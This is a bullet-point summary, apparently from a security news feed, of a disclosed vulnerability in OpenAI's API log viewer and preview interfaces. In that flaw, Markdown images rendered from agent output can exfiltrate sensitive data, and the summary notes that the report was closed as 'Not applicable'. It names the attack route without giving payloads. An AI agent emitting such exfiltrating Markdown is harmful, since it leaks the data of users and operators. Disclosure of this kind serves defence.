OpenAI API Logs: Unpatched data exfiltration
3 months ago
- #Data Exfiltration
- #OpenAI
- #API Security
- OpenAI's API log viewer is vulnerable to data exfiltration, exposing apps and agents using OpenAI APIs.
- The vulnerability involves insecure Markdown image rendering in API logs, risking sensitive data exposure.
- OpenAI closed the vulnerability report as 'Not applicable' after multiple follow-ups.
- The attack chain demonstrates how malicious Markdown images can exfiltrate data via OpenAI's log viewer.
- Systems built with OpenAI's 'responses' and 'conversations' APIs, including Agent Builder and Assistants, are affected.
- Preview interfaces for testing AI tools also exhibit insecure Markdown rendering, expanding the attack surface.
- Alternative defenses like content security policies can be bypassed when logs are reviewed in OpenAI's platform.
- The responsible disclosure process ended with the report being deemed 'Non-Applicable' by OpenAI.